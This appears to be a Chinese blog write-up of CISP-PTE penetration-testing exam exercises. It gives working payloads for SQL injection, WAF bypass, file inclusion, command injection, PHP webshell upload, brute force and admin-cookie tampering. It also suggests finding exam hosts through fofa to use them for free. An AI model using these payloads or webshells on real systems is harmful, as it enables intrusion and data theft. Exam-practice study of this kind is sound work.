CISP-PTE
CISP-PTE 2021-12-20
简介
CISP-PTE考试练习,白嫖题目,使用fofa进行搜索body="CISP-PTE 认证考试"
SQL注入
考点一:二次注入
1、注册账户
2、判断注入
title=1&content=1' and '1'= '1
title=1&content=1' and '1'= '0
3、构建payload
title=1&content=1','a'),('a',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'a //查询表名
title=1&content=1','a'),('a',(select group_concat(column_name) from information_schema.columns where table_name=0x757365727331),'a //查询列名
title=1&content=1','a'),('a',(select password from users1 limit 0,1),'a //查询字段
考点二: waf绕过
1、payload
猜测字段数
?id=1%') order by 7 --+ //正常
?id=1%') order by 8 --+ //页面不正常
联合查询
(1)、测试过滤union,双写绕过
id=-1%') ununionion select 1,2,3,4,5,6,7 --+
(2)、包含key,没出来内容(应该是没有放)
id=-1%') ununionion select 1,2,load_file('/tmp/360/key'),4,5,6,7 --+
文件包含
考点一:本地包含
1、访问,file传入view.html值
2、尝试本地包含不行,远程包含也不行
3、访问view.html,发现源码
4、查看代码,需要POST两个值
5、构造payload
Hello=1&z0=c3lzdGVtKCdjYXQgLi4va2V5LnBocCcpOw==
考点二:远程文件包含
1、在自己服务器上构造xx.html
<?php
eval($_POST[1]);
?>
2、payload
1=system('cat ../key.php');
命令执行
考点一:常用命令绕过
1、payload
127.0.0.1&rev ../key.p[a-z]p
文件上传
1、构建一句话木马
GIF89a
<script language='php'>system($_POST[1]);</script>
2、使用bp修改类型
3、查看key.php
日志分析
1、下载日志,在日志中发现adminlogin.php路径
2、访问页面,不知道密码,使用bp进行爆破
3、密码为password123
反序列化漏洞
1、查看源码
2、构建payload
<?php
$a = "CISP-PTE";
echo serialize($a);
?>
逻辑漏洞
1、使用bp进行抓包
2、修改IsAdmin=true;username=admin(base64)
版权声明:
本站所有文章除特别声明外,均採用 CC BY-NC-SA 4.0 许可协议。转载请注明来自
weehhd!
喜欢就支持一下吧
打赏
微信
支付宝